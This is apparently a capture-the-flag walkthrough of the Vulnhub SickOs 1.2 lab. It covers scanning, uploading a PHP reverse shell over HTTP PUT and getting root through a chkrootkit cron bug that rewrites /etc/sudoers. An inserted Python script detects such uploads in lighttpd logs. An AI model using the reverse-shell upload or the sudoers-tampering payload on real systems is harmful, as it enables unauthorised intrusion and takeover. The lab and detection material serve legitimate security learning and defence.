Today we are playing with SickOs 1.2 from Vulnhub.
Get the IP first.
nmap -sP 192.168.18.0/24
The IP address is 192.168.18.90.
Let's do a detailed scan now.
root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.28:
| CVE-2013-4559 7.6 https://vulners.com/cve/CVE-2013-4559
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2013-4508 5.8 https://vulners.com/cve/CVE-2013-4508
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
| CVE-2011-4362 5.0 https://vulners.com/cve/CVE-2011-4362
|_ CVE-2013-4560 2.6 https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.04 ms 192.168.18.90
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds
We have nothing interesting in index.php, but there is a page at /test.
Let's use curl to check the allowed HTTP methods (OPTIONS).
curl -v -X OPTIONS http://192.168.18.90/test
Here PUT is allowed. Let's try uploading a PHP shell there.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Let's download this and PUT it to the server.
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz
Edit the IP and PORT in the script.
Start a netcat listener on our machine:
nc -nlvp 5555
and upload it to the server:
curl --upload-file shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0
Now try to access it on the server.
WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
Looks like a firewall problem. Let's try port 443: edit the port in the file and re-upload it to the target.
We got a connection from the server. Great.
Let's now try to escalate privileges.
First get a TTY shell with the following command:
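From the defender's side, the upload above leaves a clear trail in the web server's access log. The following Python script is an added example, not part of the original walkthrough: it parses lighttpd access-log lines (assuming the default accesslog.format) and flags WebDAV write methods, script uploads, and a later request for a file that was just uploaded. The log lines are constructed to mirror the OPTIONS probe, the HTTP/1.0 PUT of shell.php and the GET that triggers it.

```python
import re
from typing import Dict, List

# Constructed sample lines (not from the original post) in lighttpd's default
# accesslog.format: %h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i".
# They mirror the OPTIONS probe, the PUT of shell.php over HTTP/1.0 and the GET
# that triggers it; client and vhost addresses are made up.
SAMPLE_ACCESS_LOG = """\
192.168.18.20 192.168.18.90 - [11/Aug/2020:04:30:01 -0400] "OPTIONS /test HTTP/1.1" 200 0 "-" "curl/7.68.0"
192.168.18.20 192.168.18.90 - [11/Aug/2020:04:30:12 -0400] "PUT /test/shell.php HTTP/1.0" 201 0 "-" "curl/7.68.0"
192.168.18.20 192.168.18.90 - [11/Aug/2020:04:30:40 -0400] "GET /test/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.18.20 192.168.18.90 - [11/Aug/2020:04:31:00 -0400] "GET /index.php HTTP/1.1" 200 163 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# WebDAV/HTTP methods that modify server content; none should reach a static site.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
# Extensions the server would execute rather than serve as a plain file.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".sh")


def parse_line(line: str) -> Dict[str, str]:
    """Split one access-log line into fields; returns {} for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}


def detect_webdav_abuse(log_text: str) -> List[Dict[str, str]]:
    """Flag write-method requests and, worse, later execution of a file uploaded by PUT."""
    alerts: List[Dict[str, str]] = []
    uploaded: Dict[str, str] = {}  # path -> client whose PUT succeeded (2xx)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        method, path, status = rec["method"], rec["path"], rec["status"]
        if method in WRITE_METHODS:
            is_script = path.lower().endswith(SCRIPT_EXT)
            alerts.append({"severity": "high" if is_script else "medium", "client": rec["client"],
                           "path": path, "reason": f"{method} request to web root"})
            if method == "PUT" and is_script and status.startswith("2"):
                uploaded[path] = rec["client"]
        elif path in uploaded and status.startswith("2"):
            # The uploaded script was requested and served: likely shell execution.
            alerts.append({"severity": "critical", "client": rec["client"], "path": path,
                           "reason": f"uploaded script executed (PUT by {uploaded[path]})"})
    return alerts
```

Run `detect_webdav_abuse` over the real access log to get one "high" alert for the PUT and one "critical" alert for the first GET of the uploaded file; the same idea generalises to any write method against a server that should be read-only.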
python -c 'import pty;pty.spawn("/bin/bash")'
Let's have a look at the cron jobs.
ls -l /etc/cron.daily
There is a cron job running chkrootkit. There is a known vulnerability in chkrootkit here:
https://www.exploit-db.com/exploits/33899
chkrootkit will run any executable placed at /tmp/update with root privileges.
Let's create the file:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
Here the cron job runs daily, so we need to wait until the next time it runs. Use this command to check whether the file has been updated:
ls -la /etc/sudoers
After a few minutes the /etc/sudoers file got updated.
Now check our privileges.
We are root now. Let's find the flag.
SickOS v2 conquered! Next day, next machine!